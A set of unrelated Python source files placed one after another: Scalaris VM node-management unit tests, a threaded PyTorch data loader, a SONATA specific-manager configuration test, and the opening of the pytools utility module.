# Test method for ScalarisVM(conn)
def testScalarisVM2(self):
rdht = ScalarisVM(conn = scalaris.JSONConnection(url = scalaris.DEFAULT_URL))
rdht.close_connection()
# Test method for ScalarisVM.close_connection() trying to close the connection twice.
def testDoubleClose(self):
rdht = ScalarisVM()
rdht.close_connection()
rdht.close_connection()
def testGetVersion_NotConnected(self):
"""Test method for ScalarisVM.getVersion() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getVersion())
vm.getVersion()
vm.close_connection()
def testGetVersion1(self):
"""Test method for ScalarisVM.getVersion()."""
vm = ScalarisVM()
version = vm.getVersion()
self.assertTrue(isinstance(version, basestring), msg = version)
self.assertTrue(len(version) > 0)
vm.close_connection()
def testGetInfo_NotConnected(self):
"""Test method for ScalarisVM.getInfo() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getInfo())
vm.getInfo()
vm.close_connection()
def testGetInfo1(self):
"""Test method for ScalarisVM.getInfo()."""
vm = ScalarisVM()
info = vm.getInfo()
self.assertTrue(isinstance(info.scalarisVersion, basestring), msg = info.scalarisVersion)
self.assertTrue(len(info.scalarisVersion) > 0, msg = "scalaris_version (" + info.scalarisVersion + ") != \"\"");
self.assertTrue(isinstance(info.erlangVersion, basestring), msg = info.erlangVersion)
self.assertTrue(len(info.erlangVersion) > 0, msg = "erlang_version (" + info.erlangVersion + ") != \"\"");
self.assertTrue(isinstance(info.memTotal, int), msg = info.memTotal)
self.assertTrue(info.memTotal >= 0, msg = "mem_total (" + str(info.memTotal) + ") >= 0");
self.assertTrue(isinstance(info.uptime, int), msg = info.uptime)
self.assertTrue(info.uptime >= 0, msg = "uptime (" + str(info.uptime) + ") >= 0");
self.assertTrue(isinstance(info.erlangNode, basestring), msg = info.erlangNode)
self.assertTrue(len(info.erlangNode) > 0, msg = "erlang_node (" + info.erlangNode + ") != \"\"");
self.assertTrue(isinstance(info.port, int), msg = info.port)
self.assertTrue(info.port >= 0 and info.port <= 65535, msg = "0 <= port (" + str(info.port) + ") <= 65535");
self.assertTrue(isinstance(info.yawsPort, int), msg = info.yawsPort)
self.assertTrue(info.yawsPort >= 0 and info.yawsPort <= 65535, msg = "0 <= yaws_port (" + str(info.yawsPort) + ") <= 65535");
vm.close_connection()
def testGetNumberOfNodes_NotConnected(self):
"""Test method for ScalarisVM.getNumberOfNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getNumberOfNodes())
vm.getNumberOfNodes()
vm.close_connection()
def testGetNumberOfNodes1(self):
"""Test method for ScalarisVM.getVersion()."""
vm = ScalarisVM()
number = vm.getNumberOfNodes()
self.assertTrue(isinstance(number, int), msg = number)
self.assertTrue(number >= 0)
vm.close_connection()
def testGetNodes_NotConnected(self):
"""Test method for ScalarisVM.getNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getNodes())
vm.getNodes()
vm.close_connection()
def testGetNodes1(self):
"""Test method for ScalarisVM.getNodes()."""
vm = ScalarisVM()
nodes = vm.getNodes()
self.assertTrue(isinstance(nodes, list), msg = nodes)
self.assertTrue(len(nodes) >= 0)
self.assertEqual(len(nodes), vm.getNumberOfNodes())
vm.close_connection()
def testAddNodes_NotConnected(self):
"""Test method for ScalarisVM.addNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.addNodes(0))
vm.addNodes(0)
vm.close_connection()
def testAddNodes0(self):
"""Test method for ScalarisVM.addNodes(0)."""
self._testAddNodes(0)
def testAddNodes1(self):
"""Test method for ScalarisVM.addNodes(1)."""
self._testAddNodes(1)
def testAddNodes3(self):
"""Test method for ScalarisVM.addNodes(3)."""
self._testAddNodes(3)
def _testAddNodes(self, nodesToAdd):
"""Test method for ScalarisVM.addNodes(nodesToAdd)."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
(ok, failed) = vm.addNodes(nodesToAdd)
size = size + nodesToAdd
self.assertEqual(nodesToAdd, len(ok))
self.assertEqual(len(failed), 0)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
for name in ok:
self.assertTrue(name in nodes, str(nodes) + " should contain " + name)
for name in ok:
vm.killNode(name)
size = size - nodesToAdd
self.assertEqual(size, vm.getNumberOfNodes())
vm.close_connection()
def testShutdownNode_NotConnected(self):
"""Test method for ScalarisVM.shutdownNode() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNode("test"))
vm.shutdownNode("test")
vm.close_connection()
def testShutdownNode1(self):
"""Test method for ScalarisVM.shutdownNode()."""
self._testDeleteNode('shutdown')
def testKillNode_NotConnected(self):
"""Test method for ScalarisVM.killNode() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNode("test"))
vm.killNode("test")
vm.close_connection()
def testKillNode1(self):
"""Test method for ScalarisVM.killNode()."""
self._testDeleteNode('kill')
def _testDeleteNode(self, action):
"""Test method for ScalarisVM.shutdownNode() and ScalarisVM.killNode()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
(ok, _failed) = vm.addNodes(1)
name = ok[0]
self.assertEqual(size + 1, vm.getNumberOfNodes())
if action == 'shutdown':
result = vm.shutdownNode(name)
elif action == 'kill':
result = vm.killNode(name)
self.assertTrue(result)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testShutdownNodes_NotConnected(self):
"""Test method for ScalarisVM.shutdownNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNodes(0))
vm.shutdownNodes(0)
vm.close_connection()
def testShutdownNodes0(self):
"""Test method for ScalarisVM.shutdownNodes(0)."""
self._testDeleteNodes(0, 'shutdown')
def testShutdownNodes1(self):
"""Test method for ScalarisVM.shutdownNodes(1)."""
self._testDeleteNodes(1, 'shutdown')
def testShutdownNodes3(self):
"""Test method for ScalarisVM.shutdownNodes(3)."""
self._testDeleteNodes(3, 'shutdown')
def testKillNodes_NotConnected(self):
"""Test method for ScalarisVM.killNodes() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNodes(0))
vm.killNodes(0)
vm.close_connection()
def testKillNodes0(self):
"""Test method for ScalarisVM.killNodes(0)."""
self._testDeleteNodes(0, 'kill')
def testKillNodes1(self):
"""Test method for ScalarisVM.killNodes(1)."""
self._testDeleteNodes(1, 'kill')
def testKillNodes3(self):
"""Test method for ScalarisVM.killNodes(3)."""
self._testDeleteNodes(3, 'kill')
def _testDeleteNodes(self, nodesToRemove, action):
"""Test method for ScalarisVM.shutdownNode() and ScalarisVM.killNode()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
if nodesToRemove >= 1:
vm.addNodes(nodesToRemove)
self.assertEqual(size + nodesToRemove, vm.getNumberOfNodes())
if action == 'shutdown':
result = vm.shutdownNodes(nodesToRemove)
elif action == 'kill':
result = vm.killNodes(nodesToRemove)
self.assertEqual(nodesToRemove, len(result))
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
for name in result:
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testShutdownNodesByName_NotConnected(self):
"""Test method for ScalarisVM.shutdownNodesByName() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownNodesByName(["test"]))
vm.shutdownNodesByName(["test"])
vm.close_connection()
def testShutdownNodesByName0(self):
"""Test method for ScalarisVM.shutdownNodesByName(0)."""
self._testDeleteNodes(0, 'shutdown')
def testShutdownNodesByName1(self):
"""Test method for ScalarisVM.shutdownNodesByName(1)."""
self._testDeleteNodes(1, 'shutdown')
def testShutdownNodesByName3(self):
"""Test method for ScalarisVM.shutdownNodesByName(3)."""
self._testDeleteNodes(3, 'shutdown')
def testKillNodesByName_NotConnected(self):
"""Test method for ScalarisVM.killNodesByName() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killNodesByName(["test"]))
vm.killNodesByName(["test"])
vm.close_connection()
def testKillNodesByName0(self):
"""Test method for ScalarisVM.killNodesByName(0)."""
self._testDeleteNodes(0, 'kill')
def testKillNodesByName1(self):
"""Test method for ScalarisVM.killNodesByName(1)."""
self._testDeleteNodes(1, 'kill')
def testKillNodesByName3(self):
"""Test method for ScalarisVM.killNodesByName(3)."""
self._testDeleteNodes(3, 'shutdown')
def _testDeleteNodesByName(self, nodesToRemove, action):
"""Test method for ScalarisVM.shutdownNode() and ScalarisVM.killNode()."""
vm = ScalarisVM()
size = vm.getNumberOfNodes();
if nodesToRemove >= 1:
vm.addNodes(nodesToRemove)
self.assertEqual(size + nodesToRemove, vm.getNumberOfNodes())
nodes = vm.getNodes()
shuffle(nodes)
removedNodes = nodes[:nodesToRemove]
if action == 'shutdown':
(ok, not_found) = vm.shutdownNodesByName(removedNodes)
elif action == 'kill':
(ok, not_found) = vm.killNodesByName(removedNodes)
self.assertEqual(nodesToRemove, len(ok))
self.assertEqual(nodesToRemove, len(not_found))
list.sort(removedNodes)
list.sort(ok)
self.assertEqual(removedNodes, ok)
self.assertEqual(size, vm.getNumberOfNodes())
nodes = vm.getNodes()
for name in ok:
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testGetOtherVMs_NotConnected(self):
"""Test method for ScalarisVM.getOtherVMs() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getOtherVMs(0))
vm.getOtherVMs(1)
def testGetOtherVMs1(self):
"""Test method for ScalarisVM.getOtherVMs(1)."""
self._testGetOtherVMs(1)
def testGetOtherVMs2(self):
"""Test method for ScalarisVM.getOtherVMs(2)."""
self._testGetOtherVMs(2)
def testGetOtherVMs3(self):
"""Test method for ScalarisVM.getOtherVMs(3)."""
self._testGetOtherVMs(3)
def _testGetOtherVMs(self, maxVMs):
"""Test method for ScalarisVM.getOtherVMs()."""
vm = ScalarisVM()
otherVMs = vm.getOtherVMs(maxVMs)
self.assertTrue(len(otherVMs) <= maxVMs, "list too long: " + str(otherVMs))
for otherVMUrl in otherVMs:
otherVM = ScalarisVM(JSONConnection(otherVMUrl))
otherVM.getInfo()
otherVM.close_connection()
vm.close_connection()
# not tested because we still need the Scalaris Erlang VM:
def _testShutdownVM_NotConnected(self):
"""Test method for ScalarisVM.shutdownVM() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownVM())
vm.shutdownVM()
# not tested because we still need the Scalaris Erlang VM:
def _testShutdownVM1(self):
"""Test method for ScalarisVM.shutdownVM()."""
vm = ScalarisVM()
vm.shutdownVM()
# not tested because we still need the Scalaris Erlang VM:
def _testKillVM_NotConnected(self):
"""Test method for ScalarisVM.killVM() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killVM())
vm.killVM()
# not tested because we still need the Scalaris Erlang VM:
def _testKillVM1(self):
"""Test method for ScalarisVM.killVM()."""
vm = ScalarisVM()
vm.killVM()
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
dataloader.py
|
import threading
import queue
from typing import Iterable, Callable, Optional, Any, Union
import time
import torch
from copy import deepcopy
from ctools.torch_utils import to_device
from .collate_fn import default_collate
class AsyncDataLoader(object):
def __init__(
self,
data_source: Union[Callable, dict],
batch_size: int,
device: str,
chunk_size: Optional[int] = None,
collate_fn: Optional[Callable] = None,
num_workers: int = 0,
use_async=True,
use_async_cuda=True, # using aysnc cuda costs extra GPU memory
max_reuse=0,
) -> None:
self.use_async = use_async
self.use_async_cuda = use_async_cuda
self.data_source = data_source
self.batch_size = batch_size
self.device = device
self.use_cuda = isinstance(self.device, int)
if self.use_cuda:
self.stream = torch.cuda.Stream()
if collate_fn is None:
self.collate_fn = default_collate
else:
self.collate_fn = collate_fn
self.num_workers = num_workers
if self.num_workers < 0:
raise ValueError(
'num_workers should be non-negative; '
'use num_workers = 0 or 1 to disable multiprocessing.'
)
self.reuse_count = max_reuse
self.max_reuse = max_reuse
self.cache_data = None
torch.set_num_threads(torch.get_num_threads() // 4)
if self.use_async:
self.queue_maxsize = 1
self.worker_queue = queue.Queue(maxsize=1)
self.data_queue = queue.Queue(maxsize=self.queue_maxsize)
self.read_data_thread = threading.Thread(target=self.read_data_loop, args=(), daemon=True)
self.read_data_thread.start()
self.workers = [threading.Thread(target=self._worker_loop, args=(), daemon=True) for _ in range(self.num_workers)]
for w in self.workers:
w.start()
# cuda thread
if self.use_async_cuda:
# the queue to store processed cuda data, user will get data from it if use cuda
self.cuda_queue = queue.Queue(maxsize=self.queue_maxsize)
self.cuda_thread = threading.Thread(target=self._cuda_loop, args=())
self.cuda_thread.daemon = True
self.cuda_thread.start()
def __iter__(self) -> Iterable:
"""
Overview:
Return the iterable self as an iterator
Returns:
- self (:obj:`Iterable`): self as an iterator
"""
return self
def read_data_loop(self) -> None:
while True:
data = self.data_source(self.batch_size)
while self.worker_queue.qsize() > 0: # make sure only last queue has cache data
time.sleep(0.1)
self.worker_queue.put(data)
def _worker_loop(self) -> None:
print('dataloader worker start, threads:{}!!!!!!!!!!!!!!!!!!'.format(torch.get_num_threads()))
while True:
try:
data = self.worker_queue.get()
for i in range(len(data)):
data[i] = data[i]()
except Exception as e:
print(e)
continue
data = self.collate_fn(data)
while self.data_queue.qsize() > 0:
time.sleep(0.1)
self.data_queue.put(data)
def _cuda_loop(self) -> None:
"""
Overview:
Only when using cuda, would this be run as a thread through ``self.cuda_thread``.
Get data from ``self.async_train_queue``, change its device and put it into ``self.cuda_queue``
"""
with torch.cuda.stream(self.stream):
while True:
while self.cuda_queue.qsize() > 0:
time.sleep(0.1)
data = self.data_queue.get()
data = to_device(data, self.device)
self.cuda_queue.put(data)
def sync_loop(self):
while True:
try:
data = self.data_source(self.batch_size, paths)
for i in range(len(data)):
data[i] = data[i]()
break
except:
pass
data = self.collate_fn(data)
if self.use_cuda:
data = to_device(data, self.device)
return data
def __next__(self) -> Any:
"""
Overview:
Return next data in the iterator. If use cuda, get from ``self.cuda_queue``;
Otherwise, get from ``self.async_train_queue``.
Returns:
- data (:obj:`torch.Tensor`): next data in the iterator
"""
if self.use_async:
if self.use_cuda:
if self.reuse_count == self.max_reuse:
if self.use_async_cuda:
self.cache_data = self.cuda_queue.get()
else:
self.cache_data = self.data_queue.get()
self.cache_data = to_device(self.cache_data, self.device)
self.reuse_count = 0
else:
self.reuse_count += 1
return self.cache_data
else:
return self.data_queue.get()
else:
return self.sync_loop()
|
testConf.py
|
'''
Created on Jun 13, 2017
@author: ubuntu
'''
import unittest
import yaml
import threading
import logging
import time
import sys
from multiprocessing import Process
from fakeFLM import fakeflm
from fakeSMR import fakesmr
from sonmanobase import messaging
from sonfsmvprxsquidconfiguration1.sonfsm_face import faceFSM
logging.basicConfig(level=logging.INFO)
logging.getLogger('amqp-storm').setLevel(logging.INFO)
LOG = logging.getLogger("son-mano-plugins:sm_template_test")
logging.getLogger("son-mano-base:messaging").setLevel(logging.INFO)
LOG.setLevel(logging.DEBUG)
class testConf(unittest.TestCase):
def setUp(self):
self.slm_proc = Process(target= fakeflm)
self.smr_proc = Process(target= fakesmr)
self.con_proc = Process(target= faceFSM)
self.slm_proc.daemon = True
self.smr_proc.daemon = True
self.con_proc.daemon = True
self.manoconn = messaging.ManoBrokerRequestResponseConnection('ConfTest')
self.wait_for_reg_event = threading.Event()
self.wait_for_reg_event.clear()
self.wait_for_res_event = threading.Event()
self.wait_for_res_event.clear()
def tearDown(self):
if self.smr_proc is not None:
self.smr_proc.terminate()
del self.smr_proc
if self.slm_proc is not None:
self.slm_proc.terminate()
del self.slm_proc
if self.con_proc is not None:
self.con_proc.terminate()
del self.con_proc
try:
self.manoconn.stop_connection()
except Exception as e:
LOG.exception("Stop connection exception.")
def reg_eventFinished(self):
self.wait_for_reg_event.set()
def res_eventFinished(self):
self.wait_for_res_event.set()
def waitForRegEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_reg_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def waitForResEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_res_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def test_configuration_fsm(self):
def on_register_receive(ch, method, properties, message):
LOG.debug('on_register_receive with id=%s, message=%s', properties.app_id, message)
if properties.app_id != 'fake-smr':
msg = yaml.load(message)
# CHECK: The message should be a dictionary.
self.assertTrue(isinstance(msg, dict), msg='message is not a dictionary')
# CHECK: The dictionary should have a key 'specific_manager_name'.
self.assertIn('specific_manager_name', msg.keys(), msg='no specific_manager_name provided in message.')
if isinstance(msg['specific_manager_name'], str):
# CHECK: The value of 'specific_manager_name' should not be an empty string.
self.assertTrue(len(msg['specific_manager_name']) > 0, msg='empty specific_manager_name provided.')
else:
# CHECK: The value of 'specific_manager_name' should be a string
self.assertEqual(True, False, msg='specific_manager_name is not a string')
# CHECK: The dictionary should have a key 'version'.
self.assertIn('version', msg.keys(), msg='No version provided in message.')
if isinstance(msg['version'], str):
# CHECK: The value of 'version' should not be an empty string.
self.assertTrue(len(msg['version']) > 0, msg='empty version provided.')
else:
# CHECK: The value of 'version' should be a string
self.assertEqual(True, False, msg='version is not a string')
# CHECK: The dictionary should have a key 'description'
self.assertIn('description', msg.keys(), msg='No description provided in message.')
if isinstance(msg['description'], str):
# CHECK: The value of 'description' should not be an empty string.
self.assertTrue(len(msg['description']) > 0, msg='empty description provided.')
else:
# CHECK: The value of 'description' should be a string
self.assertEqual(True, False, msg='description is not a string')
# CHECK: The dictionary should have a key 'specific_manager_type'
if isinstance(msg['specific_manager_type'], str):
# CHECK: The value of 'specific_manager_type' should not be an empty string.
self.assertTrue(len(msg['specific_manager_type']) > 0, msg='empty specific_manager_type provided.')
else:
# CHECK: The value of 'specific_manager_type' should be a string
self.assertEqual(True, False, msg='specific_manager_type is not a string')
# CHECK: The dictionary should have a key 'service_name'
if isinstance(msg['service_name'], str):
# CHECK: The value of 'service_name' should not be an empty string.
self.assertTrue(len(msg['service_name']) > 0, msg='empty service_name id provided.')
else:
# CHECK: The value of 'service_name' should be a string
self.assertEqual(True, False, msg='service_name is not a string')
self.reg_eventFinished()
def on_ip_receive(ch, method, properties, message):
LOG.info('on_ip_receive message=%s', message)
LOG.info('app_id = %s', properties.app_id)
if properties.app_id == 'sonfsmvprxsquidconfiguration1':
payload = yaml.load(message)
LOG.info('IP = %s', payload['IP'])
self.assertTrue(isinstance(payload, dict), msg='message is not a dictionary')
if isinstance(payload['IP'], str):
self.assertTrue(payload['IP'] == "10.100.32.250", msg='Wrong IP address')
else:
self.assertEqual(True, False, msg='IP address is not a string')
self.res_eventFinished()
self.smr_proc.start()
time.sleep(4)
self.manoconn.subscribe(on_register_receive, 'specific.manager.registry.ssm.registration')
self.con_proc.start()
#time.sleep(4)
self.waitForRegEvent(timeout=5, msg="Registration request not received.")
LOG.info("aqui3")
self.con_proc.on_registration_ok()
LOG.info("aqui4")
self.manoconn.subscribe(on_ip_receive, 'son.configuration')
#time.sleep(4)
self.slm_proc.start()
#time.sleep(4)
self.waitForResEvent(timeout=5, msg="Configuration request not received.")
if __name__ == '__main__':
unittest.main()
|
__init__.py
|
# pylint: disable=too-many-lines
# (Yes, it has a point!)
__copyright__ = "Copyright (C) 2009-2013 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from functools import reduce, wraps
import operator
import sys
import logging
from typing import (
Any, Callable, Dict, Iterable, List, Optional, Set, Tuple, TypeVar)
import builtins
from sys import intern
decorator_module = __import__("decorator", level=0)
my_decorator = decorator_module.decorator
# These are deprecated and will go away in 2022.
all = builtins.all
any = builtins.any
__doc__ = """
A Collection of Utilities
=========================
Math
----
.. autofunction:: levi_civita
.. autofunction:: perm
.. autofunction:: comb
Assertive accessors
-------------------
.. autofunction:: one
.. autofunction:: is_single_valued
.. autofunction:: all_roughly_equal
.. autofunction:: single_valued
Memoization
-----------
.. autofunction:: memoize
.. autofunction:: memoize_on_first_arg
.. autofunction:: memoize_method
.. autofunction:: memoize_in
.. autofunction:: keyed_memoize_on_first_arg
.. autofunction:: keyed_memoize_method
Argmin/max
----------
.. autofunction:: argmin2
.. autofunction:: argmax2
.. autofunction:: argmin
.. autofunction:: argmax
Cartesian products
------------------
.. autofunction:: cartesian_product
.. autofunction:: distinct_pairs
Permutations, Tuples, Integer sequences
---------------------------------------
.. autofunction:: wandering_element
.. autofunction:: generate_nonnegative_integer_tuples_below
.. autofunction:: generate_nonnegative_integer_tuples_summing_to_at_most
.. autofunction:: generate_all_nonnegative_integer_tuples
.. autofunction:: generate_all_integer_tuples_below
.. autofunction:: generate_all_integer_tuples
.. autofunction:: generate_permutations
.. autofunction:: generate_unique_permutations
Formatting
----------
.. autoclass:: Table
.. autofunction:: string_histogram
.. autofunction:: word_wrap
Debugging
---------
.. autofunction:: typedump
.. autofunction:: invoke_editor
Progress bars
-------------
.. autoclass:: ProgressBar
Name generation
---------------
.. autofunction:: generate_unique_names
.. autofunction:: generate_numbered_unique_names
.. autoclass:: UniqueNameGenerator
Deprecation Warnings
--------------------
.. autofunction:: deprecate_keyword
Functions for dealing with (large) auxiliary files
--------------------------------------------------
.. autofunction:: download_from_web_if_not_present
Helpers for :mod:`numpy`
------------------------
.. autofunction:: reshaped_view
Timing data
-----------
.. data:: SUPPORTS_PROCESS_TIME
A :class:`bool` indicating whether :class:`ProcessTimer` measures elapsed
process time (available on Python 3.3+).
.. autoclass:: ProcessTimer
Log utilities
-------------
.. autoclass:: ProcessLogger
.. autoclass:: DebugProcessLogger
.. autoclass:: log_process
Sorting in natural order
------------------------
.. autofunction:: natorder
.. autofunction:: natsorted
Type Variables Used
-------------------
.. class:: T
Any type.
.. class:: F
Any callable.
"""
# {{{ type variables
T = TypeVar("T")
F = TypeVar("F", bound=Callable[..., Any])
# }}}
# {{{ code maintenance
class MovedFunctionDeprecationWrapper:
def __init__(self, f, deadline=None):
if deadline is None:
deadline = "the future"
self.f = f
self.deadline = deadline
def __call__(self, *args, **kwargs):
from warnings import warn
warn(f"This function is deprecated and will go away in {self.deadline}. "
f"Use {self.f.__module__}.{self.f.__name__} instead.",
DeprecationWarning, stacklevel=2)
return self.f(*args, **kwargs)
def deprecate_keyword(oldkey: str,
newkey: Optional[str] = None, *,
deadline: Optional[str] = None):
"""Decorator used to deprecate function keyword arguments.
:arg oldkey: deprecated argument name.
:arg newkey: new argument name that serves the same purpose, if any.
:arg deadline: expected time frame for the removal of the deprecated argument.
"""
from warnings import warn
if deadline is None:
deadline = "the future"
def wrapper(func):
@wraps(func)
def inner_wrapper(*args, **kwargs):
if oldkey in kwargs:
if newkey is None:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}.",
DeprecationWarning, stacklevel=2)
else:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}. "
f"Use '{newkey}' instead.",
DeprecationWarning, stacklevel=2)
if newkey in kwargs:
raise ValueError(f"Cannot use '{oldkey}' "
f"and '{newkey}' in the same call.")
kwargs[newkey] = kwargs[oldkey]
del kwargs[oldkey]
return func(*args, **kwargs)
return inner_wrapper
return wrapper
# }}}
# {{{ math --------------------------------------------------------------------
def delta(x, y):
if x == y:
return 1
else:
return 0
def levi_civita(tup):
"""Compute an entry of the Levi-Civita tensor for the indices *tuple*."""
if len(tup) == 2:
i, j = tup
return j-i
if len(tup) == 3:
i, j, k = tup
return (j-i)*(k-i)*(k-j)/2
else:
raise NotImplementedError
def factorial(n):
from operator import mul
assert n == int(n)
return reduce(mul, (i for i in range(1, n+1)), 1)
def perm(n, k):
"""Return P(n, k), the number of permutations of length k drawn from n
choices.
"""
result = 1
assert k > 0
while k:
result *= n
n -= 1
k -= 1
return result
def comb(n, k):
"""Return C(n, k), the number of combinations (subsets)
of length k drawn from n choices.
"""
return perm(n, k)//factorial(k)
def norm_1(iterable):
return sum(abs(x) for x in iterable)
def norm_2(iterable):
return sum(x**2 for x in iterable)**0.5
def norm_inf(iterable):
return max(abs(x) for x in iterable)
def norm_p(iterable, p):
return sum(i**p for i in iterable)**(1/p)
class Norm:
def __init__(self, p):
self.p = p
def __call__(self, iterable):
return sum(i**self.p for i in iterable)**(1/self.p)
# }}}
# {{{ data structures
# {{{ record
class RecordWithoutPickling:
"""An aggregate of named sub-variables. Assumes that each record sub-type
will be individually derived from this class.
"""
__slots__: List[str] = []
def __init__(self, valuedict=None, exclude=None, **kwargs):
assert self.__class__ is not Record
if exclude is None:
exclude = ["self"]
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
if valuedict is not None:
kwargs.update(valuedict)
for key, value in kwargs.items():
if key not in exclude:
fields.add(key)
setattr(self, key, value)
def get_copy_kwargs(self, **kwargs):
for f in self.__class__.fields:
if f not in kwargs:
try:
kwargs[f] = getattr(self, f)
except AttributeError:
pass
return kwargs
def copy(self, **kwargs):
return self.__class__(**self.get_copy_kwargs(**kwargs))
def __repr__(self):
return "{}({})".format(
self.__class__.__name__,
", ".join("{}={!r}".format(fld, getattr(self, fld))
for fld in self.__class__.fields
if hasattr(self, fld)))
def register_fields(self, new_fields):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
fields.update(new_fields)
def __getattr__(self, name):
# This method is implemented to avoid pylint 'no-member' errors for
# attribute access.
raise AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
class Record(RecordWithoutPickling):
__slots__: List[str] = []
def __getstate__(self):
return {
key: getattr(self, key)
for key in self.__class__.fields
if hasattr(self, key)}
def __setstate__(self, valuedict):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
for key, value in valuedict.items():
fields.add(key)
setattr(self, key, value)
def __eq__(self, other):
return (self.__class__ == other.__class__
and self.__getstate__() == other.__getstate__())
def __ne__(self, other):
return not self.__eq__(other)
class ImmutableRecordWithoutPickling(RecordWithoutPickling):
"""Hashable record. Does not explicitly enforce immutability."""
def __init__(self, *args, **kwargs):
RecordWithoutPickling.__init__(self, *args, **kwargs)
self._cached_hash = None
def __hash__(self):
if self._cached_hash is None:
self._cached_hash = hash(
(type(self),) + tuple(getattr(self, field)
for field in self.__class__.fields))
return self._cached_hash
class ImmutableRecord(ImmutableRecordWithoutPickling, Record):
pass
# }}}
class Reference:
def __init__(self, value):
self.value = value
def get(self):
from warnings import warn
warn("Reference.get() is deprecated -- use ref.value instead")
return self.value
def set(self, value):
self.value = value
class FakeList:
def __init__(self, f, length):
self._Length = length
self._Function = f
def __len__(self):
return self._Length
def __getitem__(self, index):
try:
return [self._Function(i)
for i in range(*index.indices(self._Length))]
except AttributeError:
return self._Function(index)
# {{{ dependent dictionary ----------------------------------------------------
class DependentDictionary:
def __init__(self, f, start=None):
if start is None:
start = {}
self._Function = f
self._Dictionary = start.copy()
def copy(self):
return DependentDictionary(self._Function, self._Dictionary)
def __contains__(self, key):
try:
self[key] # pylint: disable=pointless-statement
return True
except KeyError:
return False
def __getitem__(self, key):
try:
return self._Dictionary[key]
except KeyError:
return self._Function(self._Dictionary, key)
def __setitem__(self, key, value):
self._Dictionary[key] = value
def genuineKeys(self): # noqa
return list(self._Dictionary.keys())
def iteritems(self):
return self._Dictionary.items()
def iterkeys(self):
return self._Dictionary.keys()
def itervalues(self):
return self._Dictionary.values()
# }}}
# }}}
# {{{ assertive accessors
def one(iterable: Iterable[T]) -> T:
"""Return the first entry of *iterable*. Assert that *iterable* has only
that one entry.
"""
it = iter(iterable)
try:
v = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'one()'")
def no_more():
try:
next(it)
raise ValueError("iterable with more than one entry passed to 'one()'")
except StopIteration:
return True
assert no_more()
return v
def is_single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> bool:
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
all_equal = is_single_valued
def all_roughly_equal(iterable, threshold):
return is_single_valued(iterable,
equality_pred=lambda a, b: abs(a-b) < threshold)
def single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> T:
"""Return the first entry of *iterable*; Assert that other entries
are the same with the first entry of *iterable*.
"""
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
